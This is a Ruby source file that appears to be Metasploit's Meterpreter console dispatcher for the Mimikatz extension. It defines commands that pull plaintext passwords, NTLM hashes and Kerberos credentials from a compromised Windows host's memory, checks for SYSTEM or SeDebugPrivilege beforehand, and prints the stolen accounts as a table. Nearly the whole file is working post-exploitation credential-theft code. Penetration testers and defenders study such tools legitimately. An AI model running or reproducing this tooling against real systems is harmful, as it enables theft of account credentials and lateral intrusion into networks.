  1. # -*- coding: binary -*-
  2. require 'rex/post/meterpreter'
  3. module Rex
  4. module Post
  5. module Meterpreter
  6. module Ui
  7. ###
  8. #
  9. # Mimikatz extension - grabs credentials from windows memory.
  10. #
  11. # Benjamin DELPY `gentilkiwi`
  12. # http://blog.gentilkiwi.com/mimikatz
  13. #
  14. # extension converted by Ben Campbell (Meatballs)
  15. ###
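  class Console::CommandDispatcher::Mimikatz

    Klass = Console::CommandDispatcher::Mimikatz

    include Console::CommandDispatcher

    # Option parser for +mimikatz_command+. Shared by every instance; it is
    # only read (parse/usage), never mutated, after this point.
    @@command_opts = Rex::Parser::Arguments.new(
      "-f" => [true, "The function to pass to the command."],
      "-a" => [true, "The arguments to pass to the command."],
      "-h" => [false, "Help menu."]
    )

    #
    # Initializes an instance of the mimikatz command interaction.
    #
    # Emits a warning when an x86 meterpreter (and therefore the x86 build of
    # the extension) is running on a host whose sysinfo reports x64; the two
    # values are checked separately, and the sysinfo lookup only happens when
    # the platform check already matched.
    #
    # @param shell [Rex::Post::Meterpreter::Ui::Console] console owning this dispatcher
    #
    def initialize(shell)
      super

      return unless client.platform =~ /x86/ && client.sys.config.sysinfo['Architecture'] =~ /x64/

      print_line
      print_warning "Loaded x86 Mimikatz on an x64 architecture."
    end

    #
    # List of supported commands.
    #
    # @return [Hash{String => String}] command name mapped to its description
    #
    def commands
      {
        "mimikatz_command" => "Run a custom command",
        "wdigest" => "Attempt to retrieve wdigest creds",
        "msv" => "Attempt to retrieve msv creds (hashes)",
        "livessp" => "Attempt to retrieve livessp creds",
        "ssp" => "Attempt to retrieve ssp creds",
        "tspkg" => "Attempt to retrieve tspkg creds",
        "kerberos" => "Attempt to retrieve kerberos creds"
      }
    end

    #
    # Runs a mimikatz function on the remote side and prints what it returns.
    #
    # Options: -f FUNC (required), -a "ARGS" (optional, whitespace separated),
    # -h (usage). With no arguments at all the usage text is printed.
    #
    # @param args [Array<String>] raw console arguments
    # @return [true] on the help and missing-function paths; otherwise the
    #   value of +print_line+
    #
    def cmd_mimikatz_command(*args)
      args.unshift("-h") if args.empty?

      cmd_func = nil
      cmd_args = nil

      @@command_opts.parse(args) do |opt, _idx, val|
        case opt
        when "-a"
          cmd_args = val
        when "-f"
          cmd_func = val
        when "-h"
          print(
            "Usage: mimikatz_command -f func -a args\n\n" +
            "Executes a mimikatz command on the remote machine.\n" +
            "e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" +
            @@command_opts.usage)
          return true
        end
      end

      unless cmd_func
        print_error("You must specify a function with -f")
        return true
      end

      # The extension receives an argument list, not a shell string, so a
      # plain whitespace split is all that is done here; there is no quoting.
      arguments = cmd_args ? cmd_args.split(" ") : []

      print_line client.mimikatz.send_custom_command(cmd_func, arguments)
    end

    #
    # Common driver for the credential commands: reports the privilege state,
    # fetches the accounts via +method+ and prints them as a table. Note that
    # +get_privs+ only reports; the request is issued regardless of its outcome.
    #
    # @param provider [String] credential package name, used in the output only
    # @param method [#call] callable returning an Array of account Hashes keyed
    #   by :authid, :package, :domain, :user and :password
    # @return [true]
    #
    def mimikatz_request(provider, method)
      get_privs

      print_status("Retrieving #{provider} credentials")
      accounts = method.call

      # NOTE(review): SortIndex 4 sorts on the Password column; confirm this is
      # intended rather than AuthID or User.
      table = Rex::Text::Table.new(
        'Header'    => "#{provider} credentials",
        'Indent'    => 0,
        'SortIndex' => 4,
        'Columns'   => ['AuthID', 'Package', 'Domain', 'User', 'Password']
      )

      accounts.each do |acc|
        # The password cell is whatever the target returned; embedded newlines
        # are removed so one entry cannot break the table layout.
        password = (acc[:password] || "").gsub("\n", "")
        table << [acc[:authid], acc[:package], acc[:domain], acc[:user], password]
      end

      print_line table.to_s
      true
    end

    # @param args [Array<String>] ignored
    def cmd_wdigest(*args)
      mimikatz_request("wdigest", -> { client.mimikatz.wdigest })
    end

    # @param args [Array<String>] ignored
    def cmd_msv(*args)
      mimikatz_request("msv", -> { client.mimikatz.msv })
    end

    # @param args [Array<String>] ignored
    def cmd_livessp(*args)
      mimikatz_request("livessp", -> { client.mimikatz.livessp })
    end

    # @param args [Array<String>] ignored
    def cmd_ssp(*args)
      mimikatz_request("ssp", -> { client.mimikatz.ssp })
    end

    # @param args [Array<String>] ignored
    def cmd_tspkg(*args)
      mimikatz_request("tspkg", -> { client.mimikatz.tspkg })
    end

    # @param args [Array<String>] ignored
    def cmd_kerberos(*args)
      mimikatz_request("kerberos", -> { client.mimikatz.kerberos })
    end

    #
    # Reports the session's privilege state before a credential request.
    # Running as SYSTEM is reported as-is; otherwise getprivs is attempted and
    # the result is checked for SeDebugPrivilege. Nothing is returned or
    # raised on failure - the caller proceeds either way.
    #
    def get_privs
      if system_check
        print_good("Running as SYSTEM")
        return
      end

      print_status("Attempting to getprivs")
      privs = client.sys.config.getprivs
      if privs.include?("SeDebugPrivilege")
        print_good("Got SeDebugPrivilege")
      else
        print_warning("Did not get SeDebugPrivilege")
      end
    end

    #
    # @return [Boolean] true when the session user is NT AUTHORITY\SYSTEM;
    #   prints a warning and returns false otherwise
    #
    def system_check
      return true if client.sys.config.getuid == "NT AUTHORITY\\SYSTEM"

      print_warning("Not currently running as SYSTEM")
      false
    end

    #
    # Name for this dispatcher
    #
    def name
      "Mimikatz"
    end

  end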
  149. end
  150. end
  151. end
  152. end